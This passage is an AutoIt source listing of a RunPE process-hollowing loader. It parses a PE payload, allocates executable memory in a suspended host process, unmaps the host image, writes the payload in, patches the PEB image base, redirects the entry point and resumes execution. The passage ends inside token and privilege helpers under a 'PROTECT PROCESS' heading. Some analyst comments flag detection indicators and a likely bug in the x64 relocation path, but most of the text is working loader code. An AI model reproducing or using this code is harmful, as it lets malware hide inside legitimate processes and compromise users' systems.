- Local $hprocess = DllStructGetData($tprocess_information, "PROCESS")
- Local $hthread = DllStructGetData($tprocess_information, "THREAD")
- ; A 64-bit interpreter cannot hollow a WOW64 (32-bit) host: abort.
- If $fautoitx64 And __runpe_iswow64process($hprocess) Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(2, 0, 0)
- EndIf
- #region 4. FILL CONTEXT STRUCTURE
- ; $irunflag: 1 = x86 interpreter, 2 = x64 interpreter on x64 OS, 3 = unsupported (aborts).
- Local $irunflag, $tcontext
- If $fautoitx64 Then
- If @OSArch = "X64" Then
- $irunflag = 2
- $tcontext = DllStructCreate("ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & "DWORD CONTEXTFLAGS; DWORD MXCSR;" & "WORD SEGCS; WORD SEGDS; WORD SEGES; WORD SEGFS; WORD SEGGS; WORD SEGSS; DWORD EFLAGS;" & "UINT64 DR0; UINT64 DR1; UINT64 DR2; UINT64 DR3; UINT64 DR6; UINT64 DR7;" & "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; UINT64 R13; UINT64 R14; UINT64 R15;" & "UINT64 RIP;" & "UINT64 HEADER[4]; UINT64 LEGACY[16]; UINT64 XMM0[2]; UINT64 XMM1[2]; UINT64 XMM2[2]; UINT64 XMM3[2]; UINT64 XMM4[2]; UINT64 XMM5[2]; UINT64 XMM6[2]; UINT64 XMM7[2]; UINT64 XMM8[2]; UINT64 XMM9[2]; UINT64 XMM10[2]; UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; UINT64 XMM14[2]; UINT64 XMM15[2];" & "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; UINT64 LASTEXCEPTIONFROMRIP")
- Else
- $irunflag = 3
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(102, 0, 0)
- EndIf
- Else
- $irunflag = 1
- $tcontext = DllStructCreate("DWORD CONTEXTFLAGS;" & "DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & "DWORD CONTROLWORD; DWORD STATUSWORD; DWORD TAGWORD; DWORD ERROROFFSET; DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & "DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & "DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & "DWORD EBP; DWORD EIP; DWORD SEGCS; DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & "BYTE EXTENDEDREGISTERS[512]")
- EndIf
- ; CONTEXT_FULL: 65543 = 0x10007 (x86), 1048583 = 0x100007 (AMD64); case 3 is unreachable here.
- Local $context_full
- Switch $irunflag
- ;
- Case 1
- ;
- $context_full = 65543
- Case 2
- $context_full = 1048583
- ;
- Case 3
- ;
- $context_full = 524327
- ;
- EndSwitch
- DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full)
- $acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(3, 0, 0)
- EndIf
- ; At the initial suspended state the PEB address sits in EBX (x86) / RDX (x64).
- Local $ppeb
- Switch $irunflag
- Case 1
- $ppeb = DllStructGetData($tcontext, "EBX")
- Case 2
- $ppeb = DllStructGetData($tcontext, "RDX")
- Case 3
- EndSwitch
- #region 5. READ PE-FORMAT
- ; Walk DOS header -> "PE\0\0" (17744 = 0x4550) -> file header -> optional header. Magic 267
- ; (0x10B) is PE32, 523 (0x20B) is PE32+; a bitness mismatch with the interpreter aborts.
- Local $timage_dos_header = DllStructCreate("CHAR MAGIC[2];" & "WORD BYTESONLASTPAGE;" & "WORD PAGES;" & "WORD RELOCATIONS;" & "WORD SIZEOFHEADER;" & "WORD MINIMUMEXTRA;" & "WORD MAXIMUMEXTRA;" & "WORD SS;" & "WORD SP;" & "WORD CHECKSUM;" & "WORD IP;" & "WORD CS;" & "WORD RELOCATION;" & "WORD OVERLAY;" & "CHAR RESERVED[8];" & "WORD OEMIDENTIFIER;" & "WORD OEMINFORMATION;" & "CHAR RESERVED2[20];" & "DWORD ADDRESSOFNEWEXEHEADER", $ppointer)
- Local $pheaders_new = $ppointer
- $ppointer += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER")
- Local $smagic = DllStructGetData($timage_dos_header, "MAGIC")
- If Not ($smagic == "MZ") Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(4, 0, 0)
- EndIf
- Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $ppointer)
- $ppointer += 4
- If DllStructGetData($timage_nt_signature, "SIGNATURE") <> 17744 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(5, 0, 0)
- EndIf
- Local $timage_file_header = DllStructCreate("WORD MACHINE;" & "WORD NUMBEROFSECTIONS;" & "DWORD TIMEDATESTAMP;" & "DWORD POINTERTOSYMBOLTABLE;" & "DWORD NUMBEROFSYMBOLS;" & "WORD SIZEOFOPTIONALHEADER;" & "WORD CHARACTERISTICS", $ppointer)
- Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS")
- $ppointer += 20
- Local $tmagic = DllStructCreate("WORD MAGIC;", $ppointer)
- Local $imagic = DllStructGetData($tmagic, 1)
- Local $timage_optional_header
- If $imagic = 267 Then
- If $fautoitx64 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(6, 0, 0)
- EndIf
- $timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "DWORD BASEOFDATA;" & "DWORD IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "DWORD SIZEOFSTACKRESERVE;" & "DWORD SIZEOFSTACKCOMMIT;" & "DWORD SIZEOFHEAPRESERVE;" & "DWORD SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $ppointer)
- $ppointer += 96
- ElseIf $imagic = 523 Then
- If Not $fautoitx64 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(6, 0, 0)
- EndIf
- $timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "UINT64 IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "UINT64 SIZEOFSTACKRESERVE;" & "UINT64 SIZEOFSTACKCOMMIT;" & "UINT64 SIZEOFHEAPRESERVE;" & "UINT64 SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $ppointer)
- $ppointer += 112
- Else
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(6, 0, 0)
- EndIf
- Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT")
- Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS")
- Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE")
- Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE")
- ; Skip data directories 0..4 (5 x 8 bytes) to reach IMAGE_DIRECTORY_ENTRY_BASERELOC (index 5).
- $ppointer += 8
- $ppointer += 8
- $ppointer += 24
- Local $timage_directory_entry_basereloc = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZE", $ppointer)
- Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS")
- Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE")
- Local $frelocatable
- If $paddressnewbasereloc And $isizebasereloc Then $frelocatable = True
- If Not $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
- ; Skip the remaining 11 directories (indices 5..15) to land on the first section header.
- $ppointer += 88
- #region 6. ALLOCATE 'NEW' MEMORY SPACE
- ; Relocatable image: allocate anywhere, fall back to the preferred base (unmapping whatever
- ; is there first). Non-relocatable: the preferred base is the only option.
- Local $frelocate
- Local $pzeropoint
- If $frelocatable Then
- $pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
- If @error Then
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(101, 1, 0)
- EndIf
- EndIf
- EndIf
- $frelocate = True
- Else
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(101, 0, 0)
- EndIf
- EndIf
- EndIf
- DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint)
- #region 7. CONSTRUCT THE NEW MODULE
- ; Build the in-memory image locally: headers first, then each section at its RVA (copying
- ; min(VirtualSize, SizeOfRawData) bytes), remembering where the .reloc data lives.
- Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]")
- Local $pmodule = DllStructGetPtr($tmodule)
- Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
- DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
- Local $timage_section_header
- Local $isizeofrawdata, $ppointertorawdata
- Local $ivirtualaddress, $ivirtualsize
- Local $trelocraw
- For $i = 1 To $inumberofsections
- $timage_section_header = DllStructCreate("CHAR NAME[8];" & "DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & "DWORD VIRTUALADDRESS;" & "DWORD SIZEOFRAWDATA;" & "DWORD POINTERTORAWDATA;" & "DWORD POINTERTORELOCATIONS;" & "DWORD POINTERTOLINENUMBERS;" & "WORD NUMBEROFRELOCATIONS;" & "WORD NUMBEROFLINENUMBERS;" & "DWORD CHARACTERISTICS", $ppointer)
- $isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA")
- $ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA")
- $ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS")
- $ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
- If $ivirtualsize And $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize
- If $isizeofrawdata Then
- DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
- EndIf
- If $frelocate Then
- If $ivirtualaddress <= $paddressnewbasereloc And $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then
- $trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
- EndIf
- EndIf
- $ppointer += 40
- Next
- ; Apply base relocations locally, then write the whole image into the host in one call.
- If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
- $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0)
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(7, 0, 0)
- EndIf
- #region 8. PEB IMAGEBASEADDRESS MANIPULATION
- ; Read the host PEB, overwrite ImageBaseAddress with the payload base, write it back. This is
- ; what makes the host "look like" the payload to the loader (and is a good memory-forensics
- ; tell: PEB image base != the base of the mapped on-disk image).
- Local $tpeb = DllStructCreate("BYTE INHERITEDADDRESSSPACE;" & "BYTE READIMAGEFILEEXECOPTIONS;" & "BYTE BEINGDEBUGGED;" & "BYTE SPARE;" & "PTR MUTANT;" & "PTR IMAGEBASEADDRESS;" & "PTR LOADERDATA;" & "PTR PROCESSPARAMETERS;" & "PTR SUBSYSTEMDATA;" & "PTR PROCESSHEAP;" & "PTR FASTPEBLOCK;" & "PTR FASTPEBLOCKROUTINE;" & "PTR FASTPEBUNLOCKROUTINE;" & "DWORD ENVIRONMENTUPDATECOUNT;" & "PTR KERNELCALLBACKTABLE;" & "PTR EVENTLOGSECTION;" & "PTR EVENTLOG;" & "PTR FREELIST;" & "DWORD TLSEXPANSIONCOUNTER;" & "PTR TLSBITMAP;" & "DWORD TLSBITMAPBITS[2];" & "PTR READONLYSHAREDMEMORYBASE;" & "PTR READONLYSHAREDMEMORYHEAP;" & "PTR READONLYSTATICSERVERDATA;" & "PTR ANSICODEPAGEDATA;" & "PTR OEMCODEPAGEDATA;" & "PTR UNICODECASETABLEDATA;" & "DWORD NUMBEROFPROCESSORS;" & "DWORD NTGLOBALFLAG;" & "BYTE SPARE2[4];" & "INT64 CRITICALSECTIONTIMEOUT;" & "DWORD HEAPSEGMENTRESERVE;" & "DWORD HEAPSEGMENTCOMMIT;" & "DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & "DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & "DWORD NUMBEROFHEAPS;" & "DWORD MAXIMUMNUMBEROFHEAPS;" & "PTR PROCESSHEAPS;" & "PTR GDISHAREDHANDLETABLE;" & "PTR PROCESSSTARTERHELPER;" & "PTR GDIDCATTRIBUTELIST;" & "PTR LOADERLOCK;" & "DWORD OSMAJORVERSION;" & "DWORD OSMINORVERSION;" & "DWORD OSBUILDNUMBER;" & "DWORD OSPLATFORMID;" & "DWORD IMAGESUBSYSTEM;" & "DWORD IMAGESUBSYSTEMMAJORVERSION;" & "DWORD IMAGESUBSYSTEMMINORVERSION;" & "DWORD GDIHANDLEBUFFER[34];" & "DWORD POSTPROCESSINITROUTINE;" & "DWORD TLSEXPANSIONBITMAP;" & "BYTE TLSEXPANSIONBITMAPBITS[128];" & "DWORD SESSIONID")
- $acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(8, 0, 0)
- EndIf
- DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint)
- $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(9, 0, 0)
- EndIf
- #region 9. NEW ENTRY POINT
- ; In the initial suspended context the entry point is carried in EAX (x86) / RCX (x64);
- ; point it at the payload's AddressOfEntryPoint.
- Switch $irunflag
- Case 1
- DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew)
- Case 2
- DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew)
- Case 3
- EndSwitch
- #region 10. SET NEW CONTEXT
- $acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(10, 0, 0)
- EndIf
- #region 11. RESUME THREAD
- ; From here on the host process executes the payload.
- $acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread)
- If @error Or $acall[0] = -1 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(11, 0, 0)
- EndIf
- #region 12. CLOSE OPEN HANDLES AND RETURN PID
- DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess)
- DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread)
- Return DllStructGetData($tprocess_information, "PROCESSID")
- EndFunc ;==>_RunPE
- ; __runpe_fixreloc: apply the payload's PE relocation table to the image copy
- ; in $pmodule after it was rebased from $paddressold to $paddressnew.
- ;   $pmodule      - pointer to the payload image in the local (AutoIt) process
- ;   $tdata        - DllStruct over the raw relocation directory (.reloc)
- ;   $fimagex64    - truthy selects 64-bit fixups; the caller above passes the
- ;                   comparison `$imagic = 523` (0x20B = PE32+ optional-header magic)
- ; Always returns 1; the relocation data is not validated.
- ; NOTE(analysis): patched slots are read/written as "PTR", whose width follows
- ; the running AutoIt interpreter rather than $fimagex64 - presumably only
- ; correct for a same-bitness payload; verify before trusting the x64 path.
- Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)
- Local $idelta = $paddressnew - $paddressold   ; added to every absolute address in the image
- Local $isize = DllStructGetSize($tdata)
- Local $pdata = DllStructGetPtr($tdata)
- Local $timage_base_relocation, $irelativemove
- Local $ivirtualaddress, $isizeofblock, $inumberofentries
- Local $tenries, $idata, $taddress
- Local $iflag = 3 + 7 * $fimagex64   ; 3 = IMAGE_REL_BASED_HIGHLOW (32-bit), 10 = IMAGE_REL_BASED_DIR64 (64-bit)
- While $irelativemove < $isize   ; $irelativemove is never initialised; AutoIt's default ("") presumably compares as 0
- $timage_base_relocation = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $pdata + $irelativemove)   ; IMAGE_BASE_RELOCATION block header
- $ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS")   ; RVA of the 4 KiB page this block covers
- $isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK")   ; header + entries, in bytes
- $inumberofentries = ($isizeofblock - 8) / 2   ; WORD entries follow the 8-byte header
- $tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
- For $i = 1 To $inumberofentries
- $idata = DllStructGetData($tenries, 1, $i)
- If BitShift($idata, 12) = $iflag Then   ; high 4 bits = relocation type, low 12 bits = offset within the page
- $taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
- DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
- EndIf
- Next
- $irelativemove += $isizeofblock   ; advance to the next block
- WEnd
- Return 1
- EndFunc ;==>__runpe_fixreloc
- ; __runpe_allocateexespaceataddress: VirtualAllocEx $isize bytes at the fixed
- ; address $paddress inside the target process $hprocess.
- ; First attempt: MEM_COMMIT (0x1000); fallback: MEM_COMMIT|MEM_RESERVE (0x3000).
- ; Both use PAGE_EXECUTE_READWRITE (0x40). Returns the base, or 0 with @error=1.
- ; NOTE(detection): a remote RWX allocation at the payload's preferred image
- ; base is a classic process-hollowing / RunPE indicator.
- Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize)
- Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 4096, "DWORD", 64)
- If @error Or Not $acall[0] Then
- $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)   ; retry, also reserving the range
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
- EndIf
- Return $acall[0]
- EndFunc ;==>__runpe_allocateexespaceataddress
- ; __runpe_allocateexespace: VirtualAllocEx $isize bytes at any address in
- ; $hprocess with MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE
- ; (0x40). Returns the base, or 0 with @error=1. Same RWX indicator as above.
- Func __runpe_allocateexespace($hprocess, $isize)
- Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
- Return $acall[0]
- EndFunc ;==>__runpe_allocateexespace
- ; __runpe_unmapviewofsection: NtUnmapViewOfSection on $paddress in the target
- ; process - presumably the host executable's own image, to make room for the
- ; payload (process hollowing). Only the DllCall itself is checked (@error);
- ; the returned NTSTATUS is discarded, so an unmap failure still returns 1.
- Func __runpe_unmapviewofsection($hprocess, $paddress)
- DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress)
- If @error Then Return SetError(1, 0, 0)
- Return 1
- EndFunc ;==>__runpe_unmapviewofsection
- ; __runpe_iswow64process: IsWow64Process wrapper. Returns the BOOL out
- ; parameter (non-zero when $hprocess is a 32-bit process on 64-bit Windows),
- ; or 0 with @error=1 if the call failed.
- Func __runpe_iswow64process($hprocess)
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0)
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
- Return $acall[2]   ; the BOOL* out value
- EndFunc ;==>__runpe_iswow64process
- ;END OF RUNPE----------------------------------
- ;PROTECT PROCESS
- ; Constants for the token/privilege helpers that follow (they appear to be
- ; copies of AutoIt's Security.au3 / WinAPI.au3 UDFs) and for the GDI wrappers.
- Global Const $tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct"   ; RECT, used by _winapi_getclientrect
- Global Const $tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes"   ; TOKEN_PRIVILEGES with a single LUID_AND_ATTRIBUTES
- Global Const $error_no_token = 1008   ; ERROR_NO_TOKEN: the thread is not impersonating yet
- Global Const $se_privilege_enabled_by_default = 1
- Global Const $se_privilege_enabled = 2   ; SE_PRIVILEGE_ENABLED attribute bit toggled by _security__setprivilege
- Global Const $se_privilege_removed = 4
- Global Enum $tokenprimary = 1, $tokenimpersonation   ; TOKEN_TYPE
- Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation   ; SECURITY_IMPERSONATION_LEVEL
- Global Const $token_assign_primary = 1   ; TOKEN_* access rights
- Global Const $token_duplicate = 2
- Global Const $token_impersonate = 4
- Global Const $token_query = 8
- Global Const $token_query_source = 16
- Global Const $token_adjust_privileges = 32
- ; _winapi_getlasterror: return GetLastError() while re-asserting the caller's
- ; current @error/@extended (passed in as defaults) so they are not clobbered.
- Func _winapi_getlasterror($curerr = @error, $curext = @extended)
- Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
- Return SetError($curerr, $curext, $aresult[0])
- EndFunc
- ; _security__adjusttokenprivileges: AdjustTokenPrivileges wrapper. Returns
- ; True when the API returned non-zero, False with @error=1 if the call failed.
- ; NOTE: Win32 reports success even when not all privileges were assigned
- ; (ERROR_NOT_ALL_ASSIGNED); this wrapper does not consult GetLastError.
- Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0)
- Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired)
- If @error Then Return SetError(1, @extended, False)
- Return NOT ($acall[0] = 0)
- EndFunc
- ; _security__getlengthsid: GetLengthSid wrapper; validates the SID first.
- ; Returns the SID length in bytes, or 0 (@error=1 invalid SID, 2 call failed).
- Func _security__getlengthsid($psid)
- If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
- Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid)
- If @error Then Return SetError(2, @extended, 0)
- Return $acall[0]
- EndFunc
- ; _security__impersonateself: ImpersonateSelf wrapper - gives the calling
- ; thread its own impersonation token (default level SecurityImpersonation) so
- ; OpenThreadToken succeeds afterwards. Returns True/False.
- Func _security__impersonateself($ilevel = $securityimpersonation)
- Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel)
- If @error Then Return SetError(1, @extended, False)
- Return NOT ($acall[0] = 0)
- EndFunc
- ; _security__isvalidsid: IsValidSid wrapper. Returns True/False.
- Func _security__isvalidsid($psid)
- Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid)
- If @error Then Return SetError(1, @extended, False)
- Return NOT ($acall[0] = 0)
- EndFunc
- ; _security__lookupaccountname: LookupAccountNameW wrapper.
- ; Returns a 3-element array [string SID, referenced domain, SID_NAME_USE],
- ; or 0 with @error=1. The SID buffer is fixed at 256 bytes.
- ; (Not referenced by any code visible in this listing.)
- Func _security__lookupaccountname($saccount, $ssystem = "")
- Local $tdata = DllStructCreate("byte SID[256]")
- Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0)
- If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
- Local $aacct[3]
- $aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID"))
- $aacct[1] = $acall[5]   ; ReferencedDomainName out buffer
- $aacct[2] = $acall[7]   ; SID_NAME_USE out value
- Return $aacct
- EndFunc
- ; _security__lookupprivilegevalue: LookupPrivilegeValueW wrapper. Returns the
- ; privilege LUID as an int64, or 0 with @error=1.
- Func _security__lookupprivilegevalue($ssystem, $sname)
- Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0)
- If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
- Return $acall[3]   ; the LUID out value
- EndFunc
- ; _security__openthreadtoken: OpenThreadToken wrapper; defaults to the current
- ; thread. Returns the token handle, or 0 (@error=1 GetCurrentThread failed,
- ; 2 OpenThreadToken failed - e.g. ERROR_NO_TOKEN when not impersonating).
- Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False)
- If $hthread = 0 Then $hthread = _winapi_getcurrentthread()
- If @error Then Return SetError(1, @extended, 0)
- Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0)
- If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
